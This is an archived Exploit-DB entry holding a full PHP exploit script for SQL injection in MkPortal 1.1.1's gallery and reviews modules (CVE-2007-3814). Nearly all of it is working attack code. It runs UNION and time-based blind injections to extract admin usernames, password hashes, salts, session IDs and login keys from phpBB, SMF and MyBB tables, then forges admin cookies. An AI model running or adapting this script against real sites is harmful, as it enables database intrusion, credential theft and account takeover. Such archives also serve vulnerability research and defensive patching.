MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit

2007-07-12T00:00:00
ID EDB-ID:4179
Type exploitdb
Reporter Coloss
Modified 2007-07-12T00:00:00

Description

MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit. CVE-2007-3814. Webapps exploit for php platform

                                        
                                            &lt;?php

/*
[i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal &lt;= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids

[Notes]
At this time MkPortal 1.1.1 is the latest stable release
Currently implemented: phpbb, smf and mybb
*/


$exptime = 3600;
$stcnt = 300000;
$maxnull = 5;

$opts = getopt("u:U:P:f:m:d:o:");

$vars = array ( "phpbb", "1 UNION SELECT %s FROM phpbb_users WHERE user_id=2",
                "phpbb_sid", "1 UNION SELECT %s FROM phpbb_sessions WHERE session_user_id=2 ORDER BY descrizione DESC LIMIT 1",
                "smf", "1 UNION SELECT %s FROM smf_members WHERE ID_MEMBER=1",
                "mybb", "1 UNION SELECT %s FROM mybb_users WHERE uid=1",
);


print
"[i] MkPortal \"reviews\" and \"gallery\" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal &lt;= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids\n\n";


if ($opts[u] == '')
        die(help($argv[0]));

if (!strncmp($opts[u], "http", 4))
        $url = $opts[u];
else
        $url = "http://".$opts[u];

if ($opts[U])
        $user = $opts[U];
if ($opts[P])
        $pass = $opts[P];
if ($opts[f])
        $forum = $opts[f];
if ($opts[m])
        $met = $opts[m];
if ($opts[o])
        $file = $opts[o];
if ($opts[d])
        $dir = $opts[d];

$cookies = '';
$delay = $min = $max = $mid = 0;
$fld1 = $fld2 = '';

if (!$forum)
        die("[X] You haven't specified any forum type!\n");

echo "[+] Target: $url [$forum]\n\n";

exploit();


function exploit_gallery ($f)
{
        global $cookies, $url, $fld1, $fld2;
        $sql = get_sql($f);
        $str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
        $req = sprintf($sql, $str);

        $u = $url."index.php?ind=gallery&op=edit_file&iden=".urlencode($req);
        $html = Send($u, NULL, $cookies);
        if (strstr($html, "ERROR: Database error"))
                die("[X] SQL Query Error.. probably wrong table prefix\n");
        else if (strstr($html, "&lt;title&gt;Error&lt;/title&gt;"))
                die("[X] This method failed. Try something else\n");

        $var1 = get_string($html,"name=\"titolo\" value=\"","\"");
        $var2 = get_string($html,"name=\"descrizione\" class=\"bgselect\"&gt;","&lt;");

        return ($var1." ".$var2);
}

function get_delay ($cnt, $f, $u)
{
        global $url, $cookies, $fld1, $fld2, $met;

        $sql = get_sql($f);

        if (strstr($met, "gallery"))
                $str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
        else
                $str = $fld1;

        $inj = sprintf($sql, $str);

        if (strstr($inj, "ORDER BY")) {
                list($base, $order) = explode("ORDER BY", $inj);
                $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,1,BENCHMARK(%d,MD5(31337))) ORDER BY". $order;
        }
        else
                $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,1,BENCHMARK(%d,MD5(31337)))";

        $req = sprintf($inj, $fld1, 1, "=1", $cnt);
        $u .= urlencode($req);

        $start = getmicrotime();
        Send($u, NULL, $cookies);
        $end = getmicrotime();

        $delay = intval(10 * ($end - $start));
        return $delay;
}

function get_normaldelay ($f, $u)
{
        global $stcnt;

        $na = get_delay(1,$f,$u);
        $da = get_delay($stcnt,$f,$u);
        $nb = get_delay(1,$f,$u);
        $db = get_delay($stcnt,$f,$u);
        $nc = get_delay(1,$f,$u);
        $dc = get_delay($stcnt,$f,$u);

        $mean_delayed = intval(($da + $db + $dc) / 3);
        if ($mean_delayed &lt; 2)
                die("Failed. The Answer was too rapid, probably you have not enough privileges\n");
        return $mean_delayed;
}

function exploit_blind ($sql, $u, $field)
{
        global $cookies, $stcnt, $delay, $min, $max, $mid;

        $cnt = $stcnt * 4;

        echo "[-&gt;] Trying to find value for '".$field."'\n";

        for ($i = 1; $i &lt; 51; $i++) {
                for ($j = $min; $j &lt;= $max; $j++) {
                        if ($j == $mid)
                                $j = 97;
                        $req = sprintf($sql, $field, $i, "=$j", $cnt);
                        $ur = $u.urlencode($req);
                        $start = getmicrotime();
                        Send($ur, NULL, $cookies);
                        $end = getmicrotime();

                        $dtime = intval(10 * ($end - $start));
                        if ($dtime &gt; ($delay * 2)) {
                                $out .= chr($j);
                                echo "[+] Current value for '".$field."' (".$i."): ".$out."\n";
                                break;
                        }
                        if ($j == $max)
                                $i = 41;
                }
        }
        if ($out)
                echo "\n[-&gt;] Found value for '".$field."': ".$out."\n\n";
        return $out;
}


function exploit_gallery_blind ($f)
{
        global $fld1, $fld2, $url;

        $str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
        $sql = get_sql($f);
        $inj = sprintf($sql, $str);

        $u = $url."index.php?ind=gallery&op=edit_file&iden=";

        $var1 = exploit_init_blind($f, $u, $inj, $fld1);
        $var2 = exploit_init_blind($f, $u, $inj, $fld2);

        return ($var1." ".$var2);
}

function exploit_reviews ($f)
{
        global $fld1, $fld2, $url;

        $u = $url."index.php?ind=reviews&op=update_file&iden=";
        $sql = get_sql($f);

        $inj = sprintf($sql, $fld1);
        $var1 = exploit_init_blind($f, $u, $inj, $fld1);

        $inj = sprintf($sql, $fld2);
        $var2 = exploit_init_blind($f, $u, $inj, $fld2);

        return ($var1." ".$var2);
}

function exploit_init_blind ($f, $u, $inj, $field)
{
        global $cookies, $delay, $fld1, $fld2, $mid;

        if (strstr($inj, "ORDER BY")) {
                list($base, $order) = explode("ORDER BY", $inj);
                if ($mid == 58)
                        $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
                else
                        $inj = $base."AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
        }
        else {
                if ($mid == 58)
                        $inj .= " AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1)";
                else
                        $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)";
        }

        echo "[-&gt;] Starting blind sql injection!\n";

        echo "[+] Getting standard response delay... ";
        $delay = get_normaldelay($f,$u);
        echo $delay."ds\n\n";

        $var = exploit_blind($inj, $u, $field);
        if (strstr($f, "sid") && !$var)
                die("[X] Probably there are more sid in the table.. so we cannot fetch it.. retry later.\n");

        return $var;
}

function get_data ($f)
{
        global $met;

        switch ($met) {
                case 'reviews':
                        $res = exploit_reviews($f); break;
                case 'gallery-blind':
                        $res = exploit_gallery_blind($f); break;
                case 'gallery':
                        $res = exploit_gallery($f); break;
                default:
                        die("[X] Invalid exploit method specified\n");
        }
        return $res;
}

function phpbb_exploit ()
{
        global $dir, $url, $user, $pass, $cookies, $forum, $exptime, $fld1, $fld2, $min, $max, $mid;

        if ($user && $pass) {
                echo "[+] Logging in... ";

                $u = $url.$dir."login.php?login=true";
                $post = "username=".$user."&password=".$pass."&redirec=portalhome&submit=Login";

                $html = Send($u, $post, NULL, TRUE);

                $lines = explode("\n", $html);

                foreach($lines as $line) {
                        if (strstr($line, "Set-Cookie") && strstr($line, "sid")) {
                                $cookies = get_string($line, "Set-Cookie: ", ";");
                                $c++;
                        }
                }
                if (!$cookies || $c &lt; 2)
                        die("Failed\n");
                echo "Successfull\n\n";
        }

        $fld1 = "username"; $fld2 = "user_password";
        $min = 48; $max = 122; $mid = 58;

        $res = get_data($forum);
        list($auesr, $apwd) = explode(" ", $res);
        if ($auser && strlen($apwd) == 32) {
                owrite("\n[+] Target: $url [$forum]\n");
                owrite("[-&gt;] Found admin username: '".$auser."'\n");
                owrite("[-&gt;] Found admin hash password: '".$apwd."'\n");
        }
        else
                die("[X] Failed to retrive informations\n");

        $fld1 = "session_id"; $fld2 = "session_time";
        $max = 102;

        $res = get_data($forum."_sid");
        list($sid,$start) = explode(" ", $res);
        if ($sid && strlen($sid) == 32) {
                $t = (int) (time() - $start - $exptime);
                if ($t &gt;= 0)
                        echo "[!] Found admin sid ('".$sid."') but it should not be valid anymore\n";
                else
                        owrite("[-&gt;] Found admin sid: '".$sid."' valid for ~".abs($t)."s\n");
        }
        else
                echo "[!] No admin sid was found\n";
}

function smf_exploit ()
{
        global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max;

        $base = 'a:4:{i:0;s:1:"1";i:1;s:40:"%s";i:2;i:1184000000;i:3;i:0;}';

        if ($user && $pass) {
                echo "[+] Logging in... ";

                $u = $url.$dir."index.php?action=login2";
                $post = "user=".$user."&passwrd=".$pass."&cookieneverexp=on&submit=Login";
                $html = Send($u, $post, NULL, TRUE);

                $lines = explode("\n", $html);
                foreach($lines as $line) {
                        if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID"))
                                $cookies = get_string($line, "Set-Cookie: ", ";");
                }
                if (!$cookies)
                        die("Failed\n");
                echo "Successfull\n\n";
        }

        $fld1 = "passwd"; $fld2 = "passwordSalt";
        $min = 48; $max = 102; $mid = 58;

        $res = get_data($forum);
        list($pwd,$salt) = explode(" ", $res);
        if ($pwd && strlen($pwd) == 40 && strlen($salt) == 4) {
                $pass = $pwd.$salt;
                $pass = sha1($pass);
                $cookie = sprintf($base, $pass);
                list($cname) = explode("=", $cookies);
                owrite("\n[+] Target: $url [$forum]\n");
                owrite("[+] Found admin cookie '".$cname."': '".urlencode($cookie)."'\n");
        }
        else
                die("[X] Failed to retrive informations\n");
}

function mybb_exploit ()
{
        global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid;

        if ($user && $pass) {
                echo "[+] Logging in... ";

                $u = $url.$dir."member.php";
                $post = "username=".$user."&password=".$pass."&action=do_login&submit=Login";
                $html = Send($u, $post, NULL, TRUE);

                $lines = explode("\n", $html);
                foreach($lines as $line) {
                        if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID") && !strstr($line, "[last") && !strstr($line,  
" sid=")) {
                                $cookies = get_string($line, "Set-Cookie: ", ";");
                        }
                }
                if (!$cookies)
                        die("Failed\n");
                echo "Successfull\n\n";
        }

        $fld1 = "loginkey"; $fld2 = "username";
        $min = 48; $max = 122; $mid = 91;

        $res = get_data($forum);
        list($key,$auser) = explode(" ", $res);
        if ($key && strlen($key) == 50) {
                $cookie = sprintf($base, $pass);
                list($cname) = explode("=", $cookies);
                owrite("\n[+] Target: $url [$forum]\n");
                owrite("[+] Found admin cookie '".$cname."': '1_".$key."'\n");
        }
        else
                die("[X] Failed to retrive informations\n");

        $fld1 = "password"; $fld2 = "salt";

        $res = get_data($forum);
        list($apwd,$salt) = explode(" ", $res);
        if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) {
                owrite("[+] Found admin hash password: '".$apwd."'\n");
                owrite("[+] Found admin password salt: '".$salt."'\n");
        }
        else
                echo "[!] No admin sid was found\n";
}

function exploit ()
{
        global $forum;

        switch ($forum) {
                case 'phpbb':
                        phpbb_exploit(); break;
                case 'smf':
                        smf_exploit(); break;
                case 'mybb':
                        mybb_exploit(); break;
                default:
                        die("Failed. Cannot handle this type of forum\n");
        }
}

function get_string ($str, $start, $end)
{
        $res = substr($str, strpos($str, $start)+strlen($start),strpos(substr($str, strpos($str, 
$start)+strlen($start),strlen($str)), $end));
        return $res;
}

function get_sql ($var)
{
        global $vars;

        for ($i = 0, $j = 1; $vars[$i]; $i++, $j++) {
                if ($vars[$i] == $var)
                        return $vars[$j];
        }
}

function getmicrotime()
{
        list($usec, $sec) = explode(" ", microtime());
        return ((float)$usec + (float)$sec);
}

function Send($url, $post_fields='', $cookie = '', $headers = FALSE)
{
        $ch = curl_init();
        $timeout = 120;

        curl_setopt ($ch, CURLOPT_URL, $url);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

        if ($post_fields) {
                curl_setopt($ch, CURLOPT_POST, 1);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
        }

        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

        if(!empty($cookie))
                curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

        if($headers === TRUE)
                curl_setopt ($ch, CURLOPT_HEADER, TRUE);
        else
                curl_setopt ($ch, CURLOPT_HEADER, FALSE);

        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

        $fc = curl_exec($ch);
        curl_close($ch);

        return $fc;
}

function owrite ($msg)
{
        global $file, $debug;

        echo $msg;

        if ($file) {
                if (!($h = fopen($file, 'ab')) && $debug) {
                        echo "[X] Cannot open '$file'\n";
                        return;
                }
                if (fwrite($h, $msg) === FALSE && $debug)
                        echo "[X] Cannot write to '$file'\n";
                fclose($h);
        }
}

function help ($prog)
{
        print "[-] Usage: $prog
         -u  &lt;url&gt;      -&gt; Sets Target url
        [-U] &lt;user&gt;     -&gt; Your username
        [-P] &lt;hash&gt;     -&gt; Your password
        [-f] &lt;type&gt;     -&gt; Sets Forum type (phpbb, smf or mybb)
        [-m] &lt;method&gt;   -&gt; Which method do you want to use (gallery or reviews)
        [-d] &lt;dir&gt;      -&gt; Sets forum subdirectory
        [-o] &lt;file&gt;     -&gt; Writes results to a file\n";
}

?&gt;

# milw0rm.com [2007-07-12]